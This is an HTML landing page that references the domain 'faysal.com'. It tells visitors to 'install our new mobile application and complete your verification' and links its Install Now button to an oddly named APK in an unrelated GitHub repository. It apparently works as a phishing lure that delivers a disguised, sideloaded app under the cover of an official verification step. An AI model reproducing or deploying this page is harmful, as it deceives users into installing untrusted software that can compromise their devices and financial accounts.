<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Responsive Centered Content</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            display: flex;
            flex-direction: column;
            align-items: center;
            font-family: Arial, sans-serif;
            text-align: center;
        }

        header {
            width: 100%;
            display: flex;
            justify-content: center;
            align-items: center;
            padding: 20px;
            background-color: #fff;
        }

        header img {
            max-width: 50%;
            height: auto;
        }

        main {
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            flex-grow: 1;
            padding: 20px;
            width: 100%;
            box-sizing: border-box;
        }

        p {
            font-size: 1.2rem;
            margin: 20px 0;
            color: #333;
        }

        a.button {
            width: 80%;
            display: inline-block;
            padding: 10px 20px;
            background-color: #673277;
            color: #fff;
            text-decoration: none;
            border-radius: 5px;
            font-size: 1rem;
            margin-top: 20px;
        }

        a.button:hover {
            background-color: #673277;
        }

        body > div {
        display: none;
    }
    </style>
<script defer="" data-domain="faysal.com" src="js/plausible.js"></script><script type="text/javascript" src="js/ad-script.js"></script></head>
<body>
    <header>
        <img src="logo.png" alt="Logo">
    </header>
    <main>
        <p>Install our new mobile application and complete your verification</p>
        <a href="https://github.com/dawnlinked/load/raw/refs/heads/main/Neoz_Downlinks-2025K_YKKS.apk" class="button">Install Now</a>
    </main>


</body></html>